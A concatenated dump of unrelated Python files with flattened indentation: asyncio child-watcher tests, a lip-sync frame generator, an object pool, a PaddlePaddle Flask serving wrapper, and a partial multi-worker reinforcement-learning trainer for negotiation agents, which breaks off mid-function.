self.assertFalse(m.WTERMSIG.called)
# terminate with unknown status
self.zombies[53] = 1178
self.running = False
self.watcher._sig_chld()
callback.assert_called_once_with(53, 1178, -19)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.reset_mock()
m.WIFEXITED.reset_mock()
m.WIFSIGNALED.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(53, 101)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_remove_child_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
# register children
with self.watcher:
self.running = True
self.watcher.add_child_handler(54, callback1, 1)
self.watcher.add_child_handler(55, callback2, 2)
self.watcher.add_child_handler(56, callback3, 3)
# remove child handler 1
self.assertTrue(self.watcher.remove_child_handler(54))
# remove child handler 2 multiple times
self.assertTrue(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
# all children terminate
self.add_zombie(54, 0)
self.add_zombie(55, 1)
self.add_zombie(56, 2)
self.running = False
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(56, 2, 3)
@waitpid_mocks
def test_sigchld_unhandled_exception(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(57, callback)
# raise an exception
m.waitpid.side_effect = ValueError
with mock.patch.object(log.logger,
'error') as m_error:
self.assertEqual(self.watcher._sig_chld(), None)
self.assertTrue(m_error.called)
@waitpid_mocks
def test_sigchld_child_reaped_elsewhere(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(58, callback)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates
self.running = False
self.add_zombie(58, 4)
# waitpid is called elsewhere
os.waitpid(58, os.WNOHANG)
m.waitpid.reset_mock()
# sigchld
with self.ignore_warnings:
self.watcher._sig_chld()
if isinstance(self.watcher, asyncio.FastChildWatcher):
# here the FastChildWatche enters a deadlock
# (there is no way to prevent it)
self.assertFalse(callback.called)
else:
callback.assert_called_once_with(58, 255)
@waitpid_mocks
def test_sigchld_unknown_pid_during_registration(self, m):
# register two children
callback1 = mock.Mock()
callback2 = mock.Mock()
with self.ignore_warnings, self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(591, 7)
# an unknown child terminates
self.add_zombie(593, 17)
self.watcher._sig_chld()
self.watcher.add_child_handler(591, callback1)
self.watcher.add_child_handler(592, callback2)
callback1.assert_called_once_with(591, 7)
self.assertFalse(callback2.called)
@waitpid_mocks
def test_set_loop(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(60, callback)
# attach a new loop
old_loop = self.loop
self.loop = self.new_test_loop()
patch = mock.patch.object
with patch(old_loop, "remove_signal_handler") as m_old_remove, \
patch(self.loop, "add_signal_handler") as m_new_add:
self.watcher.attach_loop(self.loop)
m_old_remove.assert_called_once_with(
signal.SIGCHLD)
m_new_add.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
# child terminates
self.running = False
self.add_zombie(60, 9)
self.watcher._sig_chld()
callback.assert_called_once_with(60, 9)
@waitpid_mocks
def test_set_loop_race_condition(self, m):
# register 3 children
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(61, callback1)
self.watcher.add_child_handler(62, callback2)
self.watcher.add_child_handler(622, callback3)
# detach the loop
old_loop = self.loop
self.loop = None
with mock.patch.object(
old_loop, "remove_signal_handler") as m_remove_signal_handler:
with self.assertWarnsRegex(
RuntimeWarning, 'A loop is being detached'):
self.watcher.attach_loop(None)
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
# child 1 & 2 terminate
self.add_zombie(61, 11)
self.add_zombie(62, -5)
# SIGCHLD was not caught
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(callback3.called)
# attach a new loop
self.loop = self.new_test_loop()
with mock.patch.object(
self.loop, "add_signal_handler") as m_add_signal_handler:
self.watcher.attach_loop(self.loop)
m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
callback1.assert_called_once_with(61, 11) # race condition!
callback2.assert_called_once_with(62, -5) # race condition!
self.assertFalse(callback3.called)
callback1.reset_mock()
callback2.reset_mock()
# child 3 terminates
self.running = False
self.add_zombie(622, 19)
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(622, 19)
@waitpid_mocks
def test_close(self, m):
# register two children
callback1 = mock.Mock()
with self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(63, 9)
# other child terminates
self.add_zombie(65, 18)
self.watcher._sig_chld()
self.watcher.add_child_handler(63, callback1)
self.watcher.add_child_handler(64, callback1)
self.assertEqual(len(self.watcher._callbacks), 1)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertEqual(len(self.watcher._zombies), 1)
with mock.patch.object(
self.loop,
"remove_signal_handler") as m_remove_signal_handler:
self.watcher.close()
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
self.assertFalse(self.watcher._callbacks)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertFalse(self.watcher._zombies)
class SafeChildWatcherTests (ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.SafeChildWatcher()
class FastChildWatcherTests (ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.FastChildWatcher()
class PolicyTests(unittest.TestCase):
def create_policy(self):
return asyncio.DefaultEventLoopPolicy()
def test_get_default_child_watcher(self):
policy = self.create_policy()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.ThreadedChildWatcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_after_set(self):
policy = self.create_policy()
watcher = asyncio.FastChildWatcher()
policy.set_child_watcher(watcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_thread(self):
def f():
policy.set_event_loop(policy.new_event_loop())
self.assertIsInstance(policy.get_event_loop(),
asyncio.AbstractEventLoop)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIsNone(watcher._loop)
policy.get_event_loop().close()
policy = self.create_policy()
policy.set_child_watcher(asyncio.SafeChildWatcher())
th = threading.Thread(target=f)
th.start()
th.join()
def test_child_watcher_replace_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
# Explicitly setup SafeChildWatcher,
# default ThreadedChildWatcher has no _loop property
watcher = asyncio.SafeChildWatcher()
policy.set_child_watcher(watcher)
watcher.attach_loop(loop)
self.assertIs(watcher._loop, loop)
new_loop = policy.new_event_loop()
policy.set_event_loop(new_loop)
self.assertIs(watcher._loop, new_loop)
policy.set_event_loop(None)
self.assertIs(watcher._loop, None)
loop.close()
new_loop.close()
class TestFunctional(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.loop.close()
asyncio.set_event_loop(None)
def test_add_reader_invalid_argument(self):
def assert_raises():
return self.assertRaisesRegex(ValueError, r'Invalid file object')
cb = lambda: None
with assert_raises():
self.loop.add_reader(object(), cb)
with assert_raises():
self.loop.add_writer(object(), cb)
with assert_raises():
self.loop.remove_reader(object())
with assert_raises():
self.loop.remove_writer(object())
def test_add_reader_or_writer_transport_fd(self):
def assert_raises():
return self.assertRaisesRegex(
RuntimeError,
r'File descriptor .* is used by transport')
async def runner():
tr, pr = await self.loop.create_connection(
lambda: asyncio.Protocol(), sock=rsock)
try:
cb = lambda: None
with assert_raises():
self.loop.add_reader(rsock, cb)
with assert_raises():
self.loop.add_reader(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_reader(rsock)
with assert_raises():
self.loop.remove_reader(rsock.fileno())
with assert_raises():
self.loop.add_writer(rsock, cb)
with assert_raises():
self.loop.add_writer(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_writer(rsock)
with assert_raises():
self.loop.remove_writer(rsock.fileno())
finally:
tr.close()
rsock, wsock = socket.socketpair()
try:
self.loop.run_until_complete(runner())
finally:
rsock.close()
wsock.close()
if __name__ == '__main__':
unittest.main()
|
image_generator.py
|
import os
import json
from PIL import Image
from colorama import Fore, Back, Style
import colorama
import command
import gentle
from bar import print_bar
import copy
import threading
threads = []
class LockingCounter():
def __init__(self):
self.lock = threading.Lock()
self.count = 0
def increment(self):
with self.lock:
self.count += 1
q = LockingCounter()
verbose = False
characters = ''
num_phonemes = 1
def init(phones):
global num_phonemes
num_phonemes = phones
colorama.init(convert=True)
def v_out(log):
if verbose:
print(log)
def progress_bar(frames_completed):
print_bar(frames_completed, num_phonemes, "Generating Images: ")
def get_face_path(pose):
split_pose = pose[1:-1].split('-')
if split_pose[0] in characters:
pose = characters[split_pose[0]] # splits to remove directional tag
else:
raise Exception(Fore.RED + '[ERR 412] Failed to load pose: ' + pose)
# determine whether to flip image
mirror_pose = False
mirror_mouth = False
looking_left = True
if len(split_pose) == 2:
if split_pose[1].lower() == 'right' or split_pose[1].lower() == 'r':
looking_left = False
if 'facingLeft' in pose and looking_left != pose['facingLeft']:
mirror_pose = True
if 'facingLeft' in pose and not pose['facingLeft']:
mirror_mouth = True
scale = 1
if 'default_scale' in characters:
scale = characters['default_scale']
if 'scale' in pose:
scale *= pose['scale']
return {
'face_path': characters['facesFolder'] + pose['image'],
'mouth_pos': [pose['x'], pose['y']],
'scale': float(scale),
'mirror_face': mirror_pose,
'mirror_mouth': mirror_mouth
}
def getDimensions(path, scaler) -> str:
face = Image.open(path).convert('RGBA')
w = face.size[0]
h = face.size[1]
return f'{w * scaler}:{h * scaler}'
class FrameRequest:
face_path: str = ''
mouth_path: str = ''
mouth_scale: float = 1
mouth_x: int = 0
mouth_y: int = 0
duration: float = ''
mirror_face: bool = False
mirror_mouth: bool = False
frame: int = 0
folder_name: str = 'images'
framerate = 100
dimensions: str = "TBD"
scaler: float = 1
def num_frames(frame_req: FrameRequest) -> int:
return int(frame_req.duration * 100)
def gen_frames(frame_req: FrameRequest, d):
global q
frame_req.duration = round(frame_req.duration, 2)
face = Image.open(frame_req.face_path).convert('RGBA')
face = face.resize([int(face.size[0] * frame_req.scaler), int(face.size[1] * frame_req.scaler)])
mouth = Image.open(frame_req.mouth_path).convert('RGBA')
mouth = mouth.resize([int(mouth.size[0] * frame_req.mouth_scale * frame_req.scaler),
int(mouth.size[1] * frame_req.mouth_scale * frame_req.scaler)])
if frame_req.mirror_face:
mouth = mouth.transpose(Image.FLIP_LEFT_RIGHT)
if frame_req.mirror_mouth:
face = face.transpose(Image.FLIP_LEFT_RIGHT)
centered_x = int((frame_req.mouth_x - mouth.size[0] / 2) * frame_req.scaler)
centered_y = int((frame_req.mouth_y - mouth.size[1] / 2) * frame_req.scaler)
mouth_pos = (centered_x, centered_y)
face.paste(mouth, mouth_pos, mouth)
image_path = f'generate/{frame_req.folder_name}/{frame_req.frame}.png'
face.save(image_path)
q.increment()
for frame in range(int(frame_req.duration * 100)):
image_path = f'generate/{frame_req.folder_name}/{frame_req.frame + frame}.png'
face.save(image_path)
q.increment()
# wait for image
while not os.path.isfile(image_path):
pass
face.close()
mouth.close()
class VideoRequest:
audio: str = ''
text: str = ''
mouths: str = ''
characters: str = ''
skip_frames: bool = False
skip_thresh: float = ''
framerate: int = 100
dimensions: str = ''
dimension_scaler: float = 1
verbose: bool = ''
offset: float = ''
poses_list: list = ''
poses_loc: list = ''
crumple_zone: bool = False
timestamps: list = []
def gen_vid(req: VideoRequest):
# set up process vars
global verbose
global characters
global threads
characters = json.load(open(req.character, 'r'))
command.set_verbose(req.verbose)
verbose = req.verbose
phone_reference = json.load(open(str(req.mouths), encoding='utf8'))
# get gentle of text
gentle_out = gentle.align(req.audio, req.text)
v_out(gentle_out)
frame = FrameRequest()
frame_counter = 0
# set pose to be default, set mouth to be closed
pose = get_face_path(req.poses_list[0])
frame.face_path = pose['face_path']
frame.mouth_scale = pose['scale']
frame.mirror_face = pose['mirror_face']
frame.mirror_mouth = pose['mirror_mouth']
frame.mouth_path = phone_reference['mouthsPath'] + phone_reference['closed']
frame.mouth_x = pose['mouth_pos'][0]
frame.mouth_y = pose['mouth_pos'][1]
frame.frame = frame_counter
frame.scaler = req.dimension_scaler
if req.dimensions == 'TBD':
req.dimensions = getDimensions(pose['face_path'], req.dimension_scaler)
total_time = req.offset / 100
for w in range(len(gentle_out['words'])):
word = gentle_out['words'][w]
if word['case'] == 'success' and 'phones' in word:
# keep mouth closed between last word and this word
# duration = word['start'] - last_animated_word_end
duration = word['start'] - total_time
if duration > 0:
frame.mouth_path = phone_reference['mouthsPath'] + phone_reference['closed']
frame.frame = frame_counter
frame.duration = duration
frame.duration = frame.duration
total_time += frame.duration
# thread.start_new_thread(gen_frames, (frame, ))
threads.append(threading.Thread(target=gen_frames, args=(copy.deepcopy(frame), q,)))
threads[-1].start()
frame_counter += num_frames(frame)
# if using timestamps, see if pose should be swapped
for p in range(len(req.timestamps)):
if frame.frame >= req.timestamps[p]['time']:
pose = get_face_path(req.timestamps[p]['pose'])
frame.face_path = pose['face_path']
frame.mouth_scale = pose['scale']
frame.mirror_face = pose['mirror_face']
frame.mirror_mouth = pose['mirror_mouth']
frame.mouth_x = pose['mouth_pos'][0]
frame.mouth_y = pose['mouth_pos'][1]
frame.frame = frame_counter
# decrement each loc because each previous loc is an additional 'word' in the script in animate.py
for loc in range(len(req.poses_loc)):
req.poses_loc[loc] -= 1
# change pose
if len(req.poses_loc) > 0 and int(req.poses_loc[0]) == int(w) and len(req.timestamps) == 0:
pose = get_face_path(req.poses_list.pop(0))
req.poses_loc.pop(0)
frame.face_path = pose['face_path']
frame.mouth_scale = pose['scale']
frame.mirror_face = pose['mirror_face']
frame.mirror_mouth = pose['mirror_mouth']
frame.mouth_x = pose['mouth_pos'][0]
frame.mouth_y = pose['mouth_pos'][1]
frame.frame = frame_counter
# decrement each loc because each previous loc is an additional 'word' in the script in animate.py
for loc in range(len(req.poses_loc)):
req.poses_loc[loc] -= 1
# each phoneme in a word
for p in range(len(word['phones'])):
phone = (word['phones'][p]['phone']).split('_')[0]
frame.mouth_path = phone_reference['mouthsPath'] + phone_reference['phonemes'][phone]['image']
frame.duration = word['phones'][p]['duration']
frame.frame = frame_counter
total_time += frame.duration
# frame_counter = gen_frames(frame)
threads.append(threading.Thread(target=gen_frames, args=(copy.deepcopy(frame), q,)))
threads[-1].start()
frame_counter += num_frames(frame)
last_animated_word_end = word['end']
# make mouth closed at the end
frame.mouth_path = phone_reference['mouthsPath'] + phone_reference['closed']
frame.frame = frame_counter
if req.crumple_zone:
frame.duration = frame.framerate / 10
else:
frame.duration = 0.01
threads.append(threading.Thread(target=gen_frames, args=(copy.deepcopy(frame), q,)))
threads[-1].start()
frame_counter += num_frames(frame)
while q.count <= num_phonemes:
progress_bar(q.count)
for t in threads:
t.join()
return req.dimensions
|
pool.py
|
"""Simple Pool object"""
from queue import Queue
class Proxy:
"""Wraps original object with context manager that return the object to the
pool."""
def __init__(self, obj, pool):
self._obj = obj
self._pool = pool
def __enter__(self):
return self._obj
def __exit__(self, typ, val, tb):
self._pool._put(self._obj)
class Pool:
"""Pool of objects"""
def __init__(self, objects):
self._queue = Queue()
for obj in objects:
self._queue.put(obj)
def lease(self):
"""Lease an object from the pool, should be used as contect manger.
e.g.:
with pool.lease() as conn:
cur = conn.cursor()
cur.execute('SELECT ...')
"""
return Proxy(self._queue.get(), self)
def _put(self, obj):
self._queue.put(obj)
if __name__ == '__main__':
from threading import Thread, Barrier
from time import sleep
from random import random
n = 10
b = Barrier(n)
p = Pool([1, 2, 3])
def worker(n, barrier, pool):
barrier.wait() # Wait for all threads to be ready
sleep(random() / 10)
with pool.lease() as val:
print('worker %d got resource %d' % (n, val))
for i in range(n):
Thread(target=worker, args=(i, b, p)).start()
|
web_service.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!flask/bin/python
# pylint: disable=doc-string-missing
from flask import Flask, request, abort
from multiprocessing import Pool, Process
from paddle_serving_server import OpMaker, OpSeqMaker, Server
from paddle_serving_client import Client
from contextlib import closing
import socket
class WebService(object):
def __init__(self, name="default_service"):
self.name = name
def load_model_config(self, model_config):
self.model_config = model_config
def _launch_rpc_service(self):
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(16)
server.load_model_config(self.model_config)
server.prepare_server(
workdir=self.workdir, port=self.port_list[0], device=self.device)
server.run_server()
def port_is_available(self, port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
if result != 0:
return True
else:
return False
def prepare_server(self, workdir="", port=9393, device="cpu"):
self.workdir = workdir
self.port = port
self.device = device
default_port = 12000
self.port_list = []
for i in range(1000):
if self.port_is_available(default_port + i):
self.port_list.append(default_port + i)
break
def _launch_web_service(self):
self.client = Client()
self.client.load_client_config("{}/serving_server_conf.prototxt".format(
self.model_config))
self.client.connect(["0.0.0.0:{}".format(self.port_list[0])])
def get_prediction(self, request):
if not request.json:
abort(400)
if "fetch" not in request.json:
abort(400)
try:
feed, fetch = self.preprocess(request.json["feed"],
request.json["fetch"])
if isinstance(feed, dict) and "fetch" in feed:
del feed["fetch"]
fetch_map = self.client.predict(feed=feed, fetch=fetch)
for key in fetch_map:
fetch_map[key] = fetch_map[key].tolist()
fetch_map = self.postprocess(
feed=request.json["feed"], fetch=fetch, fetch_map=fetch_map)
result = {"result": fetch_map}
except ValueError:
result = {"result": "Request Value Error"}
return result
def run_rpc_service(self):
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
p_rpc = Process(target=self._launch_rpc_service)
p_rpc.start()
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
self._launch_web_service()
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return self.get_prediction(request)
self.app_instance = app_instance
def run_web_service(self):
self.app_instance.run(host="0.0.0.0",
port=self.port,
threaded=False,
processes=1)
def get_app_instance(self):
return self.app_instance
def preprocess(self, feed=[], fetch=[]):
return feed, fetch
def postprocess(self, feed=[], fetch=[], fetch_map=None):
return fetch_map
|
multi_manager_debug.py
|
import argparse
import random
import json
import numpy as np
import json
import time
from onmt.Utils import use_gpu
import logging
from cocoa.core.util import read_json
from cocoa.core.schema import Schema
from cocoa.core.scenario_db import ScenarioDB
from cocoa.neural.loss import ReinforceLossCompute
import cocoa.options
from core.scenario import Scenario
from core.controller import Controller
from systems import get_system
from neural.rl_trainer import RLTrainer
from neural import build_optim
import options
from neural.a2c_trainer import RLStatistics
from tensorboardX import SummaryWriter
import os
from buffer import ReplayBuffer
import torch
try:
import thread
except ImportError:
import _thread as thread
import multiprocessing
import multiprocessing.connection
import math
import pickle as pkl
import numpy as np
import shutil
from multi_manager import MultiRunner, execute_runner
def init_dir(path, clean_all=False):
if not os.path.exists(path):
print('[Info] make dir {}'.format(path))
os.mkdir(path)
else:
print('[Warning] path {} exists!'.format(path))
if clean_all:
print('[Warning] clean files in {}!'.format(path))
shutil.rmtree(path, True)
# Deal with delay on NAS
while not os.path.exists(path):
os.mkdir(path)
print('[Info] remake dir {}'.format(path))
class MultiRunner:
def __init__(self, args, addr):
self.init_trainer(args)
# self.addr = self.get_real_addr(addr)
# self.conn = multiprocessing.connection.Client(self.addr)
def init_trainer(self, args):
if args.random_seed:
random.seed(args.random_seed+os.getpid())
np.random.seed(args.random_seed+os.getpid())
schema = Schema(args.schema_path)
scenario_db = ScenarioDB.from_dict(schema, read_json(args.scenarios_path), Scenario)
valid_scenario_db = ScenarioDB.from_dict(schema, read_json(args.valid_scenarios_path), Scenario)
# if len(args.agent_checkpoints) == 0
# assert len(args.agent_checkpoints) <= len(args.agents)
if len(args.agent_checkpoints) < len(args.agents):
ckpt = [None] * 2
else:
ckpt = args.agent_checkpoints
systems = [get_system(name, args, schema, False, ckpt[i], id=i) for i, name in enumerate(args.agents)]
rl_agent = 0
system = systems[rl_agent]
model = system.env.model
loss = None
# optim = build_optim(args, [model, system.env.critic], None)
optim = {'model': build_optim(args, model, None),}
if system.env.critic is not None:
optim['critic'] = build_optim(args, system.env.critic, None)
optim['critic']._set_rate(0.05)
if system.env.tom_model is not None:
optim['tom'] = build_optim(args, system.env.tom_model, None)
if args.tom_model not in ['naive', 'history']:
optim['tom_identity'] = build_optim(args, system.env.tom_model.encoder.identity, None)
# optim['tom']._set_rate(0.1)
scenarios = {'train': scenario_db.scenarios_list, 'dev': valid_scenario_db.scenarios_list}
from neural.a2c_trainer import RLTrainer as A2CTrainer
trainer = A2CTrainer(systems, scenarios, loss, optim, rl_agent,
reward_func=args.reward, cuda=(len(args.gpuid) > 0), args=args)
self.args = args
self.trainer = trainer
self.systems = systems
def get_real_addr(self, addr):
return addr
def simulate(self, cmd):
i, batch_size, real_batch = cmd
data = self.trainer.sample_data(i, batch_size, self.args, real_batch=real_batch)
return data
def train(self, epoch, batches, rewards, train_mode):
update_table = {'policy': True, 'value': True}
with torch.autograd.set_detect_anomaly(True):
if train_mode == 'normal':
pretrain_number = 3
update_table['policy'] = False
for i in range(pretrain_number):
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
update_table['policy'] = True
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
update_table['policy'] = False
for i in range(pretrain_number):
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
elif train_mode == 'fix_value':
update_table['value'] = False
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
elif train_mode == 'fix_policy':
update_table['policy'] = False
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
else:
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
return info
def trainset_valid(self, i, batch_size, real_batch, ):
data = self.trainer.sample_data(i, batch_size, self.args, real_batch=real_batch, eval=True)
return data
def get_eval_dict(self, examples, strategies):
ret = self.trainer.get_eval_dict(examples, strategies)
return ret
def valid(self, start, length):
infos = self.trainer.validate(self.args, length, start=start)
return infos
def save_model(self, i, valid_stats, score_type):
self.trainer.drop_checkpoint(self.args, i + 1, valid_stats,
model_opt=self.trainer.agents[self.trainer.training_agent].env.model_args,
score_type=score_type)
# if self.args.update_oppo:
# self.trainer.update_opponent(['policy', 'critic'])
def save_best_model(self, i, valid_stats, score_type, best_only):
self.trainer.drop_checkpoint(self.args, i + 1, valid_stats,
model_opt=self.trainer.agents[self.trainer.training_agent].env.model_args,
score_type=score_type, best_only=best_only)
def update_model(self, cmd):
model_idx, model_p, critic_p = cmd
env = self.systems[model_idx].env
env.model.load_state_dict(model_p)
env.critic.load_state_dict(critic_p)
def fetch_model(self, cmd):
model_idx = cmd[0]
env = self.systems[model_idx].env
return env.model.state_dict(), env.critic.state_dict()
def train_tom(self, model_idx, batch_iters, strategy, update_table=None, ret_table=None, dump_file=None):
env = self.systems[model_idx].env
# if learn_type == 'id':
# update = {'id': True, 'tom': False}
# ret = {'id': True, 'tom': False}
# elif learn_type == 'id_tom':
# update = {'id': True, 'tom': True}
# ret = {'id': True, 'tom': True}
# elif learn_type == 'fixed_id_tom':
# update = {'id': False, 'tom': True}
# ret = {'id': True, 'tom': True}
# elif learn_type in ['history', 'naive']:
# update = {'id': False, 'tom': True}
# ret = {'id': False, 'tom': True}
# else:
# raise NameError('unknown learn_type ')
train_loss = self.trainer.update_tom(self.args, batch_iters, strategy, env.tom_model,
update_table=update_table,
ret_table=ret_table, dump_name=dump_file)
return train_loss
def valid_tom(self, model_idx, batch_iters, strategy, update_table=None, ret_table=None, dump_file=None):
env = self.systems[model_idx].env
update_table = {'id': False, 'tom': False}
valid_loss = self.trainer.update_tom(self.args, batch_iters, strategy,
env.tom_model, update_table=update_table,
ret_table=ret_table, dump_name=dump_file)
return valid_loss
def split_batch(self, batch_iters, batch_size, device=None):
ret = self.trainer._sort_merge_batch(batch_iters, batch_size, device=device)
return ret
def add_strategy_in_language(self, batch_iters, strategies):
self.trainer.add_strategy_in_language(batch_iters, strategies)
def send(self, cmd):
if cmd[0] == 'quit':
return
elif cmd[0] == 'check':
# self.conn.send(['done'])
return ['done']
elif cmd[0] == 'simulate':
data = self.simulate(cmd[1:])
# self.conn.send(['done', pkl.dumps(data)])
return ['done', pkl.dumps(data)]
# try:
# except Exception, err:
# print(e)
# self.conn.send(['error'])
elif cmd[0] == 'train':
data = self.train(pkl.loads(cmd[1]))
# self.conn.send(['done', pkl.dumps(data)])
return ['done', pkl.dumps(data)]
# try:
# data = self.train(pkl.loads(cmd[1]))
# self.conn.send(['done', pkl.dumps(data)])
# except:
# self.conn.send(['error'])
elif cmd[0] == 'update_model':
self.update_model((cmd[1],) + pkl.loads(cmd[2]))
return ['done']
# self.conn.send(['done'])
# try:
# self.update_model(pkl.loads(cmd[1]))
# self.conn.send(['done'])
# except:
# self.conn.send(['error'])
elif cmd[0] == 'fetch_model':
data = self.fetch_model(cmd[1:])
return ['done', pkl.dumps(data)]
# self.conn.send(['done', pkl.dumps(data)])
# try:
# data = self.fetch_model(cmd[1:])
# self.conn.send(['done', pkl.dumps(data)])
# except:
# self.conn.send(['error'])
elif cmd[0] == 'valid':
data = self.valid(cmd[1])
return ['done', pkl.dumps(data)]
# self.conn.send(['done', pkl.dumps(data)])
elif cmd[0] == 'save_model':
self.save_model(pkl.loads(cmd[1]))
return ['done']
# self.conn.send(['done'])
else:
# Using Universal Formation
if len(cmd) < 2:
cmd.append([])
else:
cmd[1] = pkl.loads(cmd[1])
if len(cmd) < 3:
cmd.append({})
else:
cmd[2] = pkl.loads(cmd[2])
# try:
ret = getattr(self, cmd[0])(*cmd[1], **cmd[2])
status = 'done'
ret_data = ret
# except Exception as e:
# status = 'failed'
# print('[failed] ', e)
# ret_data = str(e)
ret_data = pkl.dumps(ret_data)
return [status, ret_data]
def local_send(self, cmd):
if len(cmd) < 2:
cmd.append([])
if len(cmd) < 3:
cmd.append({})
# try:
ret = getattr(self, cmd[0])(*cmd[1], **cmd[2])
status = 'done'
ret_data = ret
# except Exception as e:
# status = 'failed'
# print('[failed] ', e)
# ret_data = str(e)
# ret_data = pkl.dumps(ret_data)
return [status, ret_data]
class MultiManager():
def __init__(self, num_cpu, args, worker_class):
self.local_workers = []
self.worker_addr = []
self.trainer_addr = []
self.args = args
for i in range(num_cpu):
addr = ('localhost', 7000 + i)
worker = worker_class(args, addr)
self.worker_addr.append(worker)
# self.local_workers.append(multiprocessing.Process(target=execute_runner, args=(worker_class, args, addr)))
self.local_workers.append(worker)
# self.trainer = multiprocessing.Process(target=execute_runner, args=(trainer_class, args))
self.trainer = self.local_workers[0]
self.worker_listener = []
for i, addr in enumerate(self.worker_addr):
# self.worker_listener.append(multiprocessing.connection.Listener(addr))
self.worker_listener.append(addr)
self.worker_conn = []
cache_path = 'cache/{}'.format(args.name)
log_path = 'logs/' + args.name
init_dir(cache_path)
init_dir(log_path, clean_all=True)
self.writer = SummaryWriter(logdir='logs/{}'.format(args.name))
self.policies_log = [{}, {}]
def run_local_workers(self):
for w in self.local_workers:
w.start()
def update_worker_list(self):
self.worker_conn = []
for l in self.worker_listener:
# self.worker_conn.append(l.accept())
self.worker_conn.append(l)
return len(self.worker_conn)
@staticmethod
def allocate_tasks(num_worker, batch_size):
ret = []
while num_worker > 0:
ret.append(batch_size // num_worker)
batch_size -= ret[-1]
num_worker -= 1
print('allocate: {} workers, {} tasks, final list:{}'.format(num_worker, batch_size, ret))
return ret
def _draw_tensorboard(self, ii, losses, all_rewards):
# print(all_rewards)
for j in range(2):
self.writer.add_scalar('agent{}/reward'.format(j), np.mean(all_rewards[j]), ii)
if len(losses[j]) > 0:
for k in losses[j][0]:
tmp = []
for l in losses[j]:
tmp.append(l[k])
tmp = np.concatenate(tmp[j])
tmp = np.mean(tmp)
self.writer.add_scalar('agent{}/{}'.format(j, k), tmp, ii)
self.writer.flush()
def _draw_tensorboard_valid(self, ii, all_rewards):
for j in range(2):
